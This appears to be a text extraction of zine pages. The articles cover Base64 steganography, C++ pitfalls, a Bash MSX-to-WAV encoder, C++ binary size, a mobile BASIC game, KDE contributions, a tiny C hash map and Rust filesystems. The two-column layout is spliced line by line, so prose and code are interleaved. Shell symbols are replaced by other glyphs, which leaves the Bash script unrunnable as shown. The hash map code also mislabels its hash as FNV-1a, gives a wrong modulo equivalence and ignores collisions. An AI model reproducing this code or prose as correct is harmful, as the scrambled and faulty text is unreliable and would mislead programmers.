4 E 12 M 20 U 28 c 36 k 44 s 52 0 60 8
5 F 13 N 21 V 29 d 37 l 45 t 53 1 61 9
6 G 14 O 22 W 30 e 38 m 46 u 54 2 62 +
7 H 15 P 23 X 31 f 39 n 47 v 55 3 63 /

char 0 char 1 char 2 char 3


The above diagram is great if the length of data we're encoding is a multiple of 3. If it's not, we're in this weird
situation, where we don't really have to output full 4 characters, since 1⅓ or 2⅔ characters would be enough
(this is where the famous = sign comes into play in the role of padding). But characters are indivisible, meaning
they cannot be split into one-third or two-thirds of a character. So, we get left with unused bits...

byte 0
unused
bits

byte 0 byte 1
unus
ed
bits

If you are into steganography, this should be enough for you. The unused bits are almost never checked by a
decoder (at least I don't believe I've seen one that would complain about it), meaning you can hide 2 or 4 bits of
data there. That's not a lot, but then again no one said you need to use only one Base64-encoded string.
P.S. Yes, this sometimes shows up on CTFs – be on a lookout for tasks with A LOT of Base64 strings.
These illustrations were originally published as part of this blogpost: https://hexarcana.ch/b/20240816-base64-beyond-encoding/

Gynvael Coldwind
HexArcana Cybersecurity GmbH
30 https://hexarcana.ch/ SAA-ALL 0.0.7
C++ Pitfalls Programming

C++ Pitfalls Implicit conversions


Sometimes, code that we would never want to compile compiles
You could probably write an entire book about things in
just fine. Let's imagine the following code example:
this language that are unintuitive and require extra caution.
class A {
C++ has so many details, it is easy to make mistakes that int x;
could result in hours of debugging. In this article, I explain public:
some of the pitfalls you can fall into when programming in A(int x) : x(x) {}
this language and share my experience with them. };

int main() {
Operator precedence A a(5);
a = 3; // ???
Some time ago, I wrote code that had an "if" condition expression return 0;
like in the example below: }
int x = 2; But why does a = 3; compile? a is of class type and 3 is an int!
if (x & 1 == 0) Such functionality was "kindly" provided by the A's one-argument
std::cout << "true";
else constructor. It allows int values to be implicitly converted to this
std::cout << "false"; type. But why would we not want it to compile? Aren't implicit
Output: false conversions convenient? Maybe, at times, they are, but it can
When I ran my program, I noticed something wrong. After some easily introduce a bug. That is why it is good to always add the
time debugging it, the last thing to check was that "if" statement. explicit specifier to a declaration of a one-argument
When I removed the "== 0" part and negated the expression, it constructor which will prevent implicit conversions unless we are
finally worked! It was at this moment I realized that I completely sure that we need such implicit conversions in our code.
forgot about operator precedence rules. And so, if we look at the
reference list [1], the "==" operator is just above the "&" operator, Order of evaluation
making it being evaluated first. The lesson is to be more of a A word about the order of evaluation of expressions in C++ [4]:
defensive programmer e.g. by using parentheses in such cases.
Order of evaluation of any part of any expression, including order
Arithmetic conversion rules of evaluation of function arguments is unspecified (...). The
I noticed this thing when reading about arithmetic conversion compiler (...) may choose another order when the same
rules [2]. I have never caught a bug related to it, but it looks like expression is evaluated again.
an easy-to-introduce one, so I wanted to cover it here. This means we cannot expect any specific order of function calls
Suppose we have a code like below: in any expression. It's not limited only to function arguments
unsigned int x = 3u; evaluation. Below is an example of this. Please note that letters
int y = -5; could be printed in any possible order during the z() function call
if (y < x)
std::cout << "true"; and the return value calculation.
else int a() { return std::puts("a"); }
std::cout << "false"; int b() { return std::puts("b"); }
Output: false int c() { return std::puts("c"); }
For a human, it is logical that -5 is less than 3, but in C++ there are void z(int, int, int) {}
various integer types and in most operations data types need to
match. In this example, both operands of the "<" operator are int main()
converted to the unsigned int which makes the y variable {
z(a(), b(), c());
really big (the bytes holding the value are just reinterpreted as return a() + b() + c();
unsigned type) and greater than x. I encourage you to read about }
the conversion rules at least once as they are not trivial at times. Output: unspecified

Right bit-shift ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


This one I encountered pretty early in my C++ programming As you can see, C++'s traps can hide anywhere in your
learning path. I tried to do a right bit-shift of a value of signed code, so it is important to know how you can protect yourself
type like in the example below: from them. Knowing every detail would be very hard, so that is
int i = 0x80000000; why there are tools that can help us. "GCC" compiler provides
i >>= 31; options such as -Wall, -Wextra and -Wpedantic [5], that enable
std::cout << std::hex << i;
additional checks for dangerous and error-prone code structures.
unsigned int ui = 0x80000000; But when you enable those you may encounter another barrier,
ui >>= 31; which is your will to actually fix incoming compiler warnings, so I
std::cout << " " << std::hex << ui; also recommend adding -Werror option for good measure (all
Output: ffffffff 1 warnings will be then treated as compile errors). There are also
The one thing I didn't know then was that C++ compiler generates other tools such as "clang-tidy" to check code even more
a SAR (not SHR) assembly instruction (on x86) [3] from it, called thoroughly, but code analysis tools is a topic for another article ;)
an "arithmetic shift". This instruction preserves a signedness of a ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
value being shifted. In effect, the most significant bit (MSB) is [1] https://en.cppreference.com/w/cpp/language/operator_precedence
copied to the right, not shifted. This is most important when the [2] https://www.learncpp.com/cpp-tutorial/arithmetic-conversions/
MSB is a 1 because then the shifted variable is filling with high [3] https://c9x.me/x86/html/file_module_x86_id_285.html
[4] https://en.cppreference.com/w/cpp/language/eval_order
bits which changes its value, and we may not want that. [5] https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html

Artur Nowicki
https://github.com/arturn-dev
SAA-ALL 0.0.7 [email protected] 31
Programming EasyMSXbas2wav

Easy while [ ✩I -lt ✩((18*4000)) ]; do


AUX=❵printf "%02X" 127❵;
printf "\x✩AUX" >> ✩TEMPDATAFILE;

MSXBAS2wav
https://github.com/4nimanegra/EasyMSXBAS2wav
I=✩((✩I+1));
done;
}
wavheader(){
printf "RIFF";
printf "\xFF\xFF\xFF\xFF";
On this page, we will create a simple Bash script to printf "WAVEfmt ";
printf "\x10\x00\x00\x00\x01\x00\x01\x00";
encode MSX Basic programs into WAV files. printf "\x44\xac\x00\x00";
printf "\x44\xac\x00\x00";
MSX computers have different methods for encoding printf "\x01\x00\x08\x00";
AUX=❵printf "%08X" ✩((✩1))❵;
data on audio tapes. The way the bits are stored can AUX=❵awk ✬{print "\\\\x"substr(✩1,7,2)"\\\\x"substr(✩1,5,2)"\\\\x" \
substr(✩1,3,2)"\\\\x"substr(✩1,1,2)}✬ < <(printf "✩AUX")❵;
involve encoding zeros as square waves using either 1200 printf "data✩AUX";
}
Hz or 2400 Hz. Ones are encoded using a square wave encodefile(){
if [ -e ✩1 ]; then
that is twice as fast as the signal for zeros. In this work, BYTELEN=❵cat ✩1 | tr "\n" "\r" | xxd -i | tr "\n" " " | sed s/" "/""/g | \
awk -F "," ✬{print NF}✬❵;
we have encoded the data by using 1200 Hz for zeros CONT=0;
while read A; do
and 2400 Hz for ones. if [ ✩CONT == ✩((256*11)) ]; then
silence;
header;
CONT=0;
fi;
encode ✩A;
CONT=✩((CONT+1));
done < <(cat ✩1 | xxd -b | sed s/".*:"/""/ | sed s/"^ "/""/ | sed s/"[ ][ ].*"/""/ | \
sed s/" "/"\n"/g | awk ✬{print "0";I=8;while(I>0){print substr(✩1,I,1);I=I-1;}print \
"1";print "1";}✬);
Each byte should be encoded by preceding it with a if [ "" == "✩2" ]; then
ZEROS=✩((256-✩BYTELEN));
zero and using two ones as a trailer. Thus, each byte is II=0;
while [ ✩II -lt ✩ZEROS ]; do
encoded using 11 bits. for III in 0 0 0 0 0 0 0 0 0 1 1; do
encode ✩III;
done;
II=✩((✩II+1));
done;
fi;
fi;
}
The stored data begins with a header consisting of a long msxheaderfile(){
echo -n "" > tmp/headerfile.tmp;
beep: a sequence of ones over 16,000 pulses, followed II=0;
while [ ✩II -lt 10 ]; do
by the byte 0xEA repeated 10 times and the program printf "\xEA" >> tmp/headerfile.tmp;
II=✩((✩II+1));
name in 6 bytes. After this, blocks of 256 bytes are done;
echo "✩1" | awk -F "/" ✬{printf substr(✩NF,1,6);}✬ >> tmp/headerfile.tmp;
encoded, each preceded by a short beep (ones over 4,000 }
lastblockfile(){
pulses). At the end, an additional block with the byte echo -n "" > tmp/lastblockfile.tmp;
II=0;
0x1A repeated 256 times is added. while [ ✩II -lt 256 ]; do
printf "\x1A" >> tmp/lastblockfile.tmp;
II=✩((✩II+1));
done;
}
helpme(){
echo "✩0 is used to convert bas MSX basic programs into wav files.";
printf "\t✩0 command must me used with 2 arguments:\n";
printf "\t\t✩0 file.bas output.wav\n"
echo "";
printf "\tfile.bas: The name of the file whith the basic program in ascii.";
echo "";
echo "";
printf "\tfile.wav: The name of the output file where the wav is created.";
echo "";
echo "";
}
if [ "" != "✩1" ]; then
The code shows as follow: if [ "" != "✩2" ]; then
if [ -e "✩1" ]; then
#! /bin/bash if [ -e "✩2" ]; then
TEMPDATAFILE="tmp/tempdata.tmp"; echo "✩2 exists, please remove it before run the program.";
encode(){ else
BIT=✩((✩1)); touch ✩2;
if [ ✩BIT == 0 ]; then if [ "✩?" == "0" ]; then
PARAM=18; mkdir tmp 2> /dev/null;
TOTAL=1; echo -n "" > ✩TEMPDATAFILE
else header "long";
PARAM=9; msxheaderfile ✩1;
TOTAL=2; encodefile "tmp/headerfile.tmp" "NOZEROS";
fi; silence;
while [ ✩TOTAL -gt 0 ]; do header;
I=0; encodefile ✩1;
while [ ✩I -lt ✩PARAM ]; do silence;
printf "\xC0" >> ✩TEMPDATAFILE; header;
I=✩((✩I+1)); lastblockfile;
done; encodefile "tmp/lastblockfile.tmp" "NOZEROS";
I=0; TOTALLONG=❵ls -al ✩TEMPDATAFILE | awk ✬{print ✩5}✬❵;
while [ ✩I -lt ✩PARAM ]; do wavheader ✩TOTALLONG > ✩2;
printf "\x40" >> ✩TEMPDATAFILE; cat ✩TEMPDATAFILE >> ✩2;
I=✩((✩I+1)); rm tmp/headerfile.tmp tmp/lastblockfile.tmp tmp/tempdata.tmp
done; else
TOTAL=✩((✩TOTAL-1)); echo "Can not write on ✩2.";
done; fi;
} fi;
header(){ else
if [ "long" == "✩1" ]; then echo "✩1 does not exists.";
PULSES=8000; fi;
else else
PULSES=2000; helpme;
fi fi;
II=0; else
while [ ✩II -lt ✩PULSES ]; do helpme;
encode 1; fi;
II=✩((✩II+1));
done;
} The script should be executed as follows:
silence(){
I=0; ./convert.sh Easytr0n.bas ./out/Easytr0n.wav

Garcia-Jimenez, Santiago
https://github.com/4nimanegra
32 CC BY 4.0
www.trailofbits.com

We don’t just fix bugs,


we fix software.
Innovative Research Practical Solutions

References

Pure-Rust
Appsec Testing implementation
Handbook of SLH-DSA

Curated list of ML
ZKDocs
security resources

Guidance for deploying


Exploiting ML models
Nitro Enclaves

CONTACT TRAIL OF BITS


Since 2012, Trail of Bits has helped secure some of the world’s most targeted
organizations and devices. We combine high-end security research with a real-world
attacker mentality to reduce risk and fortify code.

AI/ML | Application Security | Blockchain | Cryptography | Research & Engineering


Programming Keep your C++ binary small - Coding techniques

a virtual table (a.k.a. vtable) and all the necessary


code to handle dynamic polymorphism. After that,
Keep your C++ binary small - each new virtual member function only adds one
line to the vtable per type which is somewhere
Coding techniques around 40 bytes depending on the implementation.
C++ is one of the best programming languages to
optimise your software. Usually, we talk about Templates
runtime performance when it comes to optimisation,
Write minimal templates. If you have a class or
but today let's talk about C++ and binary sizes.
function template where you can separate longer
chunks of code not using the template parameters,
In this article, we are going to cover different coding
extract them into non-templated functions and
techniques affecting binary sizes. Even though you
classes so that only the function code will be part of
can also use compiler and linker flags influencing
each template expansion.
the size of the generated code, sometimes in
combination with coding techniques.
You might try out extern templates for more gains!
It’s important to emphasize, that the below are
In C++, extern variables indicate that you'll
optimization techniques, not general best practices.
provide no definitions, the linker should find them.

Object initialization For templates, it means that code generated for a


When it comes to initialization, we have three template specialization marked extern will not be
aspects to consider. The size of an object matters part of a given object file, another translation unit
mostly if it is massively used. In many cases, it will provide it. Here is the handiest way to use it.
means that the object is used in a large container.
In the same header where you declare the
Containers with heap allocation, such as template, mark the specializations you want
std::vector or std::list can have a smaller extern. In the corresponding .cpp file provide all
binary footprint than a C-style array or a the explicit template instantiations. This way, each
std::array as they can be initialized at file including the template declaration will also
compile-time. include the externalization and via the .cpp file they
will get the actual definition.
Next is the aspect of storage duration. Variables
with static storage duration can end up in the // foo.h
template<typename T>
binary, while with other storage durations, the code
void foo(T i) { /* … */ }
creating these variables will be part of the binary. extern template void foo<int>(int i);
Initial values of member variables also matter. Give
them their type’s default values, so that the compiler // foo.cpp
can heavily optimize by setting blocks of memories template void foo<int>(int);
to zero instead of generating a lot of initialization
code. This isn’t a best practice, but an optimization
technique with certain drawbacks especially when it
comes to link-time optimization. Measure before
Special member functions
you merge!
By default, it's recommended to follow the Rule of
Zero. Otherwise, for smaller binary sizes, consider
moving the definitions of even defaulted special
Passing functions to functions
member functions to the .cpp files to avoid inlining. Speaking about bloaty templates, std::function
must be mentioned. It is a convenient but costly
way to pass a callable to another function. Instead,
The use of virtual functions you can also use function pointers if you don't need
Speaking about special member functions, we must lambda captures. With the combination of the using
mention virtual destructors. They take a heavy directive, its readability is also acceptable. Another
toll on the binary size, so you should only declare a option is to use your own templates, potentially
destructor virtual when using dynamic constrained with the power of concepts.
polymorphism. It's only the first virtual function -
which is usually the destructor - that is
disproportionately costly as it implies the creation of

Sándor Dargó
Blog: https://www.sandordargo.com/
34 X/Twitter: @SandorDargo SAA-ALL 0.0.7
Mobile Coding Journey Programming

can build games, imaginary planets, I can design


Mobile Coding Journey worlds and rule them all... Wow!

When I was a child, I loved building things with On other phones, I saw this game where you start
Lego bricks. You have some basic building blocks, as a small fish and grow by eating other smaller
you combine them in all sorts of fascinating ways, fish. Let’s implement that for starters.
you create structures. You can build a car or a
truck, an airplane or a ship. It felt awesome. Why Need to draw sprites, let’s use mobile PaintCAD:
buy pre-built toys at all? Give me more Lego
bricks!

Time went by. Lego bricks were stashed under the


bed - I was too grown up to play with it. I lived in a Graphics exported as .bmp, an array of pixels
small village, so we had a lot of fun climbing trees
and exploring many new, faraway places. Amazing Write a bunch of lines right on the phone…
as it was, I felt something was lacking. I missed 520 GELLOAD "f4","f4.bmp":SPRITEGEL "f4","f4"
that joy of building things. 522 X5%=-50:Y5%=110
530 X%=65:Y%=65
Once in a while, my uncle would visit our little 531 GELLOAD "f7","f7.bmp":SPRITEGEL "f7","f7"
532 X7%=-20:Y7%=0
village from a distant capital. He happened to 537 XF1%=XF1%+1:YF1%=60+MOD(RND(0),60):SPRITEMOVE
know a thing or two about computers, so I "f1",XF1%,YF1%
tormented him with all sorts of questions. "You 538 SETCOLOR 0,250,0
539 XF1%=XF1%+1:YF1%=60+MOD(RND(0),60):SPRITEMOVE
can run different programs, but what is a "f1",XF1%,YF1%
program?", "What does it take to be a 540 IF LEFT(0) THEN X%=X%-1
541 XF%=XF%-1:SPRITEMOVE "f",XF%,YF%
programmer?". I longed for a
542 IF XF%<=0 THEN
Lego replacement, and I knew XF%=580+MOD(RND(0),50):YF%=60+MOD(RND(0),60):SPRI
that programming would give TEMOVE "f",XF%,YF%
me that. I suppose that f4 stands for "fish of size 4"

Some time later I was ill for a


7 days in, the game was ready. ZIP it all together,
few days. Books and comics
rename to .jar... Time to share it with friends via IR
were read all the way
port or WAP upload!
through. You're in bed and
can't go for a walk, no fun. I
was scrolling through a
mobile forum, and one topic
caught my eye: “MobileBasic -
a mobile programmator”.

Hmm, there's some manual attached, let's have a


look...

There are variables and


IFs. There’s a GOTO, so
you can jump to other
lines. You can load
sprites, you can move Friends from the neighborhood trying out the game
sprites on the screen...
Acquired skills allowed me to enroll at university a
That's when it hit me.
With these primitives, I
mysterious world of programming. 🏗
few years later and continue my journey into the

Artem Zakirullin
https://twitter.com/zakirullin
SAA-ALL 0.0.7 https://github.com/zakirullin 35
Art New Inhabitants
Dmitry Petyakin
https://www.instagram.com/dmitrypetyakin/
36 https://www.artstation.com/el-metallico SAA-NA 0.0.7
My journey in KDE and FOSS Programming

M Y JOU RNEY I N WHAT I'VE LEARNED IN WORKING


AT OPEN SOURCE
KDE AND FOS S I am no pro, I keep learning every day, but I wanted to share
I have been working on KDE software as my day job for small snippets of things I've learned. Maybe you'll find them
about a year now. However, I've been contributing to useful if you're interested in contributing to a project!
KDE software for around ~3 years.
# YOU DON'T HAVE TO KNOW EVERYTHING
For those who don't know, KDE makes software for many BEFORE WORKING ON THINGS
platforms, but one of their biggest things is KDE Plasma, When I started hacking on KDE software, I knew nothing
a desktop environment for Linux devices. about Qt, C++ or QML. I had programming experience, but
You can see more here: https://kde.org/ mostly with Python from working on test automation related
things. I also have worked on my own C projects as a hobby,
When I moved to Linux as my daily driver roughly 3 years but nothing big really.
ago, I was quite impressed how well things had been
made. Over time I found some bugs that annoyed me So ask questions and write the answers down. Read the docs.
and I began trying to fix them. I had zero knowledge Just hack on things! Figuring it out as you go is perfectly fine.
about C++ or Qt, but I was so annoyed by a bug I was
determined to fix it. # EVERYTHING IS OUT IN THE OPEN
In free and open source software world, everything is shared
So I scoured through the documentations, asked openly: From mailing lists to communication, from bug
questions, hacked on things to try to make them work reports to source code and merge requests...
and eventually managed to fix it. I was happy, but.. I
craved for more. Why not continue doing this? It's good to know that when making changes to things. If you
don't know why some change was made, for example,
I then worked as a hobbyist contributor on KDE software remember that you can always scour back the git logs, mails,
for a couple of years. My day job was test automation at etc.
the time, which was quite dull. I found working on KDE
projects much more interesting and it helped me to keep # THINGS MAY GET HEATED
going. It's common, especially in more subjective matters, that some
things will raise a lot of discussion. It can get quite heated
Sadly I got laid off from that job eventually. I was really too!
frustrated, since I had to look for a new job now. I told
my friends in KDE about it. Do not let that heat burn you, but do not let it scare you
away either. Believe in your vision, but allow it to change and
What I didn't expect was a job offer in return for my mold.
venting. So of course I took it!
# CRITIQUE IS GOOD
Now, I want to emphasize that I am no code wizard who Getting your code/feature/idea/thing critiqued is a good
can get a job just like that, but I have a lot of passion and thing. Don't be scared of it. In the end, everyone is there to
drive for KDE software and Linux in general, and I guess make the project better and critique is a natural part of it. It's
that showed. not aimed at you as a person, but the thing you created.

I was a lucky, of course, but I also have skills that I would And by critique, I mean respectful discussion. That is
have never gotten if I had never started contributing. something to remember when you're the one giving the
Sure I could write code, but with open source, social critique as well.
skills are also really important, since you work with
people all day, in the open. I keep working on all those # YOU MAY ENCOUNTER NASTY PEOPLE
skills every single day. I have to put this here because it really is a thing. It's a sad,
sad thing. But it's something you may have to face. So be
For anyone else interested in working at open source, I prepared for it, but do not let it get you down.
do not have any surefire ways to get there but it is
possible. For one naysayer, there's usually 9 others who like the
changes you made.
IF YOU HAVE THE DRIVE FOR IT AND KEEP
HONING YOUR SKILLS FOR IT, YOU # REMEMBER TO REST
MIGHT BE CLOSER THAN YOU THINK. Working on open source causes people to burn out very
often, especially if one has to deal with rude people. It's good
to just completely distance yourself from the project from
time to time, and let your body and mind rest.

The project and the other contributors will wait for you to
return. I do wish I took this advice more often myself!

Art by Tyson Tan. Under Creative Commons Attribution Share‐Alike

Akseli Lahtinen
Blog: https://www.akselmo.dev
CC BY-SA 4.0 Mastodon: https://scalie.zone/@aks 37
Programming On Hash maps and their shortest implementation possible

On Hash maps and their shortest imple- Map Initialisation


mentation possible The Map structure contains the capacity, the size and
About Hash maps Explaining hash maps, their im- the array of buckets, each bucket containing void *.
plementation and showing a very short but function- This type can also just be a value, such as a double.
ing implementation in C. C, however, allows for erasing the type of a pointer
Hash maps are the backbone of fast running pro- by casting it: (void *)p. Therefore, this map can
grams. They power caches, make searching re- contain any pointer and does not assume ownership
ally fast (for certain workloads faster than search over the value itself - the downside is, the user has to
trees), allow databases to create indexes for really cast the inserted and extracted pointers, while keep-
fast lookups and are used to create sets. ing track of their lifetimes.

typedef struct Map {


Hashes and Hashing functions A hash function size_t size;
always computes the same integer for the same in- size_t cap;
put, called a hash. This integer is then used to index void **buckets;
into the underlying array of the map. If two differing } Map;
inputs compute to the same hash, a hash collision The Map is initialised with a size of 0, the defined cap
occurs - this collision can be dealt with by storing a and by allocating the buckets. We check for alloca-
list of elements at the location the hash points to, thus tion failures with the assertion.
allowing for more than one element for each hash 1 .
Let’s take a look at some common hashing applica- Map init(size_t cap) {
tions: Java hashes strings by summing the charac- Map m = {0, cap};
ters of the string, while each is xored with the length. m.buckets = malloc(sizeof(void *) * m.cap);
2
. assert(m.buckets != NULL);
return m;
var s = "Hello World"; }
for (int i = 0, h = 0; i < s.length(); i++)
h += s.codePointAt(i)*31
^ (s.length()-i); Pointer Insertion Inserting a pointer into the map
consists of incrementing the size field, computing the
We will use a similar, but different algorithm for hash- hash and assigning the element at the index to the
ing our key strings: fnv-1a 3 . The key of fnva-1a is pointer we want to insert:
to start with a default value for the hash, called the
void put(Map *m, char *str, void *value) {
base, modify it by xoring it with the current character
m->size++;
and then multiplying it with a prime number. On that
m->buckets[hash(m, str)] = value;
basis, we can create the first function of our naive
}
implementation, hash() to hash our string keys:

const size_t BASE = 0x811c9dc5; Pointer Extraction Extracting a pointer works the
const size_t PRIME = 0x01000193; same way as the insertion: computing the hash and
size_t hash(Map *m, char *str) { returning the value at the index:
size_t initial = BASE;
while(*str) initial ^= *str++ * PRIME; void *get(Map *m, char *str) {
return initial & (m->cap - 1); return m->buckets[hash(m, str)];
} }

The first things to notice is the two constants required Usage Example The callee of the map functions
by fnva-1a, the parameter of the hash function of the can even insert pointers to stack variables, even if
Map type and the bitwise and in the return statement. they do not outlive the scope. They also have to free
The m parameter is used specifically in combination the allocated bucket array.
with the bitwise & to restrict the resulting hash to
the size of the underlying array, thus eliminating out int main(void) {
of bounds errors - this way of computing modulo is Map m = init(1024);
faster than initial % (m->cap-1), but only works for double d1 = 25.0;
the cap being a power of two. We control the size of put(&m, "key", (void *)&d1);
the map, thus we can keep this in mind. printf("key=%f\n", *(double *)get(&m, "key"));
free(m.buckets);
1 https://en.wikipedia.org/wiki/Hash_collision return EXIT_SUCCESS;
2 https://docs.oracle.com/javase/8/docs/api/java/lang/String.html
}
3 https://en.wikipedia.org/wiki/Fowler-Noll-Vo_hash_function

xnacly
Blog: https://xnacly.me
38 Github: https://github.com/xnacly SAA-TIP 0.0.7
The Hitchhiker's Guide to Building a Distributed Filesystem in Rust. The beginning...
Programming

The Hitchhiker’s we distribute next replicas. Both sharding techniques


works good when nodes are added (when we need more
Guide to Building a space) or nodes are removed (when they fail or we want
to reduce the costs). Consistent hashing redistributes
Distributed the shards when nodes configuration changes, Shard
Filesystem in Rust. range splits existing ranges and assigns them to new
nodes and merges ranges with existing ones when nodes
The beginning... are removed.
The metadata will be saved in tikv DB and commu-
nication with data nodes will be via Kafka (each node
It all started after I started to learn Rust and will have its topic) to avoid congestion, we will have
picked up a learning project to keep me motivated. It decoupling and retries. Coordinator nodes will keep
was an encrypted filesystem https://github.com/ a list of ongoing tasks for the data nodes and in case a
radumarias/rencfs. There I got the basics on writing data node dies, it will reallocate the operations, shards
a filesystem with FUSE, encryption, WAL concept, and tasks to another nodes.
data integrity, parallel processing, filesystem in- DATA NODES. Once the structure and logical
ternals. distribution finishes, the client communicates directly
The next challenge I picked was building a dis- with data nodes to upload/download the shards. This
tributed filesystem. I was always fascinated by dis- will be made via HTTP with Content-Range header
tributed filesystems, using Hadoop (HDFS), Spark, at first and BitTorrent, SFTP, FTPS, gRPC with
Flink, Kafka. I became familiar with the concept Apache Arrow Flight or via QUIC later on. After
of sharding using Elasticsearch, with clusters leader a shard was uploaded, we check the transferred data
and election process using MongoDB, with WAL from with BLAKE3 and also we check it after we save it to
PostgreSQL. The next phase was collecting a lot of disk, in order to ensure data integrity. First, we write
links to read about how to build it. After a period data to a WAL (Write-ahead logging) and then period-
of research, I ended up understanding the basic con- ically or after all the files has been uploaded we write
cepts and selecting some frameworks to use. Finally, the chunks to disk. This strategy is widely used by DBs
I ended up with the following structure and frame- to ensure integrity as if the process dies or we experi-
works for the system. The repo for this project is ence a power-loss while writing, next time we restart
https://github.com/radumarias/rfs we continue the writing until all changes are applied.
COORDINDATOR NODES. These will be the FILE SYNC. We will implement Mainline DHT
entry points to the system for the client apps. They which will be an interface for DHT query and will
will be responsible for creating the structure, saving read the data from tikv. This eliminates the need for a
the metadata and create logical distribution of the tracker, which is a single point of failure, the DHT
shards (chunks from files). They will be served with is a distributed Hastable. Then we sync the file con-
gRPC using Apache Arrow Flight. They will run tent via BitTorrent, this makes sense because we will
in a distributed Raft cluster or if we don’t want the have multiple replicas for each file so that a node can
penalty of a single active master at a time, we can use read from multiple peers. The plan is to implement
smth like CRDTs (Conflict-free replicated data type ) the transport layer with QUIC and take advantage of
with Redis Sets ensuring the contraints like unique- zero-copy with sendfile() which sends the data from
ness of file names inside a folder. For actual shard- disk directly to socket, without going through the OS’s
ing and distribution it splits the file in shards of buffer not using CPU.
64MB and using Consistent hashing (used by Mon- FILE CHANGES. After the file is synced, we will
goDB and Cassandra partially) or Shard keys (used create a Merkle tree, and when the file is changed, we
by tikv and Cassandra partially) will distribute the just compare the trees starting from the root, between
shards along with their replicas on multiple data nodes. the nodes to determine the exact part and chunks from
Quick explanation on how Consistent hashing works. the files which were changed, so we sync only those.
We hash all node names or IPs and we create a ring CAP THEOREM: We target especially Consis-
with points in interval 0 . . . 264 − 1 from the hashes val- tency and Availability when possible.
ues. We add v-nodes which are virtual nodes, built NODES FAILURES. No distributed system I have
from nodes names with sequence suffix, so that hashes experiencd is 100% fault free. We need to prepare
are distributed more evenly. We’ll use BLAKE3 for the system for failure and adapt in such cases when
hashing. Then we hash the file key, like the absolute nodes go down. There are different types of failures and
path or some unique identifier, we have a number on the strategies what to do in such cases but we will be pre-
ring corresponding to the hash and we search the clos- pared for these kind of failures: Node, Network, Soft-
est node hash clockwise using binary search O(logn) or ware, Partition, Byzantine, Crash, Performance.
linear search O(n). That will be the node where the This is how we can make failure tolerant systems:
shard will be placed. We do this for all replicas also, Redundancy, Replication, Graceful Degradation,
which are hashed from the key adding a sequence suf- Fault Isolation, Failure Detection.
fix, removing already assigned nodes from the ring as

Radu Marias
https://xorio.rs
Public Domain 39
The Hitchhiker’s Guide to Building an Encrypted Filesystem in Rust Programming

The Hitchhiker’s Guide to inodes (which ends up in catastrophic failure), we keep se-
Building an Encrypted quences in keyring too and use max(keyring, data_dir).
Limits: if the instance_id is u8, the max inode (u64)
Filesystem in Rust is reduced to 256 - 3. It’s -3 and not -1 because inode
0 is not used, and 1 is reserved for root dir, so we’re left
with value 72,057,594,037,927,933. And max data to en-
BEGINNING: It all started after I began learning Rust crypt (3.09485009821345068724781055 * 1026 - 1) *
and wanted an interesting learning project to keep me mo- 256 KB, which is 7.92281625142643375935439 * 1013
tivated. Initially, I had some ideas, then consulted Chat- petabytes.
GPT, which suggested apps like a Todo list :) I pushed it Using ring for encryption will extend to RustCrypto
to more interesting and challenging realms, leading to sugges- too, which is pure Rust. First time, we generate a random
tions like a distributed filesystem, password manager, encryption key and encrypt that with another key derived
proxy, network traffic monitor... Now, these all sound from user’s password using argon2. We use only AEAD
interesting, but maybe some are a bit too complicated for a ciphers, ChaCha20Poly1305 and Aes256Gcm. Creden-
learning project, like the distributed filesystem. tials are kept in mem with secrecy, mlocked when used,
IDEA: My project idea originated from having a work- mprotected when not read and zeroized on drop. Hash-
ing directory with project information, including some pri- ing is made with blake3 and rand_chacha for random
vate data (not credentials, which I keep in Proton Pass. numbers.
I synced this directory with Resilio across multiple devices DATA-PRIVACY: We aim to offer true privacy and
but considered using Google Drive or Dropbox, but hey, for that we need to make sure we hide all metadata, con-
there is private info in there, so it is not ideal for them to tent, file name, file size, *time fields, files count, direc-
have access to it. So a solution like encrypted directo- tory structure and that all of these are encrypted. File-
ries, keeping the privacy, was appealing. So I decided to name and content are easier to hide; we just encrypt them
build one. I thought to myself this would be a great learning and pad filenames to fix the size, and we’re fine. But file
experience after all. And it was indeed. size, file count, *time fields, and directory structure are not
From a learning project, it evolved into something more, trivial. For that, we split the file in chunks, and each is like
which will soon be released as a stable version with many an item in a LinkedList on disk with next pointer kept
interesting features. You can view the project https:// encrypted inside chunk file content. This hides the actual
github.com/radumarias/rencfs. file count, but we add dummy nodes at the beginning with
FUSE: I used it before, and I could use it to expose the random data to hide it even more. Also, we add dummy
filesystem to the OS to access it from File Manager and random data to each chunk at the beginning (as it’s easier to
terminal. I looked for FUSE implementations in Rust and skip), so we hide the file size even more. All these hide file
found fuser, and later migrated to fuse3, which is async. I sizes, file count, and *times fields. This creates a problem:
began with its examples. how do we get to the root chunk files (nodes) without an at-
IN-MEMORY-FS: I started wth a simple in-memory tacker being able to do the same, given our code is publicly
FS using FUSE, where I learned more about smart point- available on GitHub? For that, we keep an index file with
ers like Box, Rc, RefCell, Arc and lifetimes. Aargh... all root chunk files (inodes, actually). What’s remaining
lifetimes, would say many, one of the most complicated con- is directory structure in the sense of the directories in-
cept in Rust, after the Borrow-Checker. They are quite side another directory. For this, we do similarly, we create
complicated at first, but after you fight them for a while, you dummy folders with random names so we hide how many ac-
bury the hatchet, and then they are easier to live with. After tual directories are there, and we keep all these in the index
you understand how and why the compiler lets you do things, file.
you understand that’s the correct way to do it, and it saves FILE-INTEGRITY: "There’s The Great Wall, and then
you from many problems, and you appreciate it. After all, there’s this: an okay WAL.". WAL(Write-ahead logging)
these are the promises of Rust, memory safety, no data is a very common technique used in DBs world for writing
race, and reduces race conditions. And indeed, it lives transactions to ensure file integrity. I’m using okaywal.
up to its promise. You need to come from other languages SEEK: To support fast seeks, we encrypt file in blocks
where you had all sorts of problems to really appreciate what of 256KB. When we need to seek on read, we translate
